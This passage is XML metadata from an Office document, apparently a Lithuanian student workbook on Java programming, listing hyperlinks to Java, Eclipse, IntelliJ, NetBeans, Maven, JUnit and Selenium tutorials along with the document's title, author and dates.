      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/creating-and-running-your-first-java-application.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7143503</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>342</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tutorialspoint.com/eclipse/eclipse_create_java_class.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>720957</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>339</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tutorialspoint.com/eclipse/eclipse_create_java_package.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179691</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>336</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tutorialspoint.com/eclipse/eclipse_create_java_project.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3473458</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>333</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://netbeans.org/features.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179659</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>330</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/idea/features.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276834</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>327</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.eclipse.org/eclipse/news/4.11/platform.php.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983087</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>324</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/netbeans/nb82/netbeans/NBDAG/working_nbeans.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6029378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>321</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://netbeans.org/community/releases/82/install.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4915213</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>318</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://netbeans.apache.org/download/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3932209</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>315</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/configuring-project-and-ide-settings.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4718608</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>312</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/installation-guide.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769489</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>309</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/idea/download.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6422560</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>306</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://help.eclipse.org/2019-03/index.jsp.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3866686</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>303</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://wiki.eclipse.org/Eclipse/Installation.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7929902</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>300</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.eclipse.org/downloads/packages.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7733308</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>297</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.youtube.com/watch?v=tiPZGba2qJg</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>65539</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>294</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://howtoubuntu.org/how-to-install-lamp-on-ubuntu</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225949</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>291</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://code.google.com/p/hamcrest/downloads/list</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179719</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>288</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://maven.apache.org/download.cgi</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3997800</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>285</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.oracle.com/technetwork/java/javase/downloads/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225949</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>282</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://code.google.com/p/hamcrest/downloads/list</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5374032</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>279</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.eclipse.org/downloads/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1179719</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>276</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://maven.apache.org/download.cgi</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225921</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>273</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.seleniumhq.org/projects/webdriver/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3997800</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>270</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.oracle.com/technetwork/java/javase/downloads/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8257588</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>267</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://testng.org/doc/download.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2293815</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>264</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://junit.org/index.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>524377</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>258</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://demoqa.com/droppable/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6160471</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>255</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.tutorialspoint.com/eclipse/eclipse_debugging_program.htm.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276916</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>252</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.jetbrains.com/help/idea/debugging-your-first-java-application.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7798910</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>249</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/8/docs/technotes/tools/windows/jdb.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114112</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>246</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/package/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>2883638</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>243</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/javaOO/enum.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3604520</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>240</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/data/autoboxing.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8192053</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>237</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://mrbool.com/java-data-type-conversion/29257.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6225926</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>234</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/nutsandbolts/opsummary.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4849685</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>231</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/nutsandbolts/variables.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3866736</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>228</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/nutsandbolts/expressions.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327768</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>225</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.javatpoint.com/java-comments.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4718615</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>222</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/javaOO/classes.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>983133</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>219</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/essential/environment/paths.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6029348</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>216</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://en.wikipedia.org/wiki/Classpath_(Java).</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046278</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>213</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/8/docs/technotes/tools/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046278</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>210</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/8/docs/technotes/tools/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5046278</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>207</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/8/docs/technotes/tools/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1704016</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>204</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://javatutorialhq.com/java/java-hello-world.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684729</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>201</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.eclipse.org/downloads.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114112</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>198</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/javase/tutorial/java/package/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3407983</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>195</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://notepad-plus-plus.org/download.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735606</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>192</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/en/java/javase.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6160470</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>189</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.oracle.com/technetwork/java/javase/downloads/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3735606</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>186</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://docs.oracle.com/en/java/javase.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6160470</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>183</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.oracle.com/technetwork/java/javase/downloads/index.html.</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094939</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>180</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://github.com/facebook/react</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6291575</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.alytus.lt/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5963855</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://demoqa.com/category/interactions/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>8126483</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>-1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>1032</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>cid:image001.jpg@01D40F86.D718AD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orinių ir praktinių užduočių mokinio sąsiuvinis</dc:title>
  <dc:subject/>
  <dc:creator>KPMPC</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Ausra</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2019-11-20T10:57:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-20T10:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-27T20:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>